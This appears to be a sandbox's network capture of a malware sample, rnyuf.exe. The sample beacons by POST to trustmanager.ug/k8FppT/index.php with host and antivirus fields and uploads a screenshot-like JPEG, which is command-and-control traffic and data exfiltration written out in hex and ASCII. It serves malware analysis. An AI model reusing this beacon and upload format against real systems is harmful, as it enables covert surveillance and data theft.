Aug 23, 2021 02:08:10.809175014 CEST	2813	IN	HTTP/1.0 404 Not Found Date: Mon, 23 Aug 2021 00:08:10 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 334 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
80	192.168.2.3	49806	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:05.011647940 CEST	16456	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:05.038542986 CEST	16458	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:05.038561106 CEST	16458	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
81	192.168.2.3	49807	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:05.212291002 CEST	16459	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:05.239435911 CEST	16460	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:05.239489079 CEST	16460	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
82	192.168.2.3	49808	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:05.419970989 CEST	16461	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:05.445760965 CEST	16476	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:05.445784092 CEST	16476	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
83	192.168.2.3	49809	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:05.424007893 CEST	16462	OUT	POST /k8FppT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----144fedd53f2aeee09aa4dbce6b6e9e32 Host: trustmanager.ug Content-Length: 93811 Cache-Control: no-cache
Aug 23, 2021 02:09:05.424181938 CEST	16462	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 31 34 34 66 65 64 64 35 33 66 32 61 65 65 65 30 39 61 61 34 64 62 63 65 36 62 36 65 39 65 33 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 Data Ascii: ------144fedd53f2aeee09aa4dbce6b6e9e32Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
Aug 23, 2021 02:09:05.424489021 CEST	16472	OUT	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
Aug 23, 2021 02:09:05.424662113 CEST	16475	OUT	Data Raw: fc b8 7d 9b c9 ce ef 61 bb 38 fc 36 fb d7 05 6e 78 a7 24 df de ff 00 c9 7e 67 55 3e 56 d2 b2 fc 3f cc f9 57 53 55 4d 4a 50 a0 01 90 70 3e 82 aa 55 cd 57 fe 42 53 7e 1f c8 55 3c 57 44 be 26 73 2d 84 a5 a5 a5 34 80 6d 14 b4 b8 a0 06 f6 a5 c5 3b 14 Data Ascii: }a86nx$~gU>V?WSUMJPp>UWBS~U<WD&s-4m;b1KN&(1K)h(bSEv1@;EE%bRPbbPRQv((PF)h4} wLT!Z,;SIVb\mbIv(SIV
Aug 23, 2021 02:09:05.450151920 CEST	16490	OUT	Data Raw: 96 28 a1 96 48 a4 48 e6 52 d1 3b 29 02 40 09 04 a9 ee 32 08 e3 b8 ac 29 50 a7 4a 72 94 34 6f 7f c4 b9 d4 9c e2 94 ba 11 d1 56 ae 34 db fb 48 9e 5b 9b 1b 98 63 49 8c 0e f2 42 ca 16 40 32 50 92 38 6c 73 8e b4 eb 6d 23 53 bc fb 3f d9 74 db c9 fe d2 Data Ascii: (HHR;)@2)PJr4oV4H[cIB@2P8lsm#S?tyP3, rq"KVn4BP}UEKtH=o*[67Vs#b`84]VZ$IN^4}BVd{D__k]Mq!{Ic-AuV2yo$d
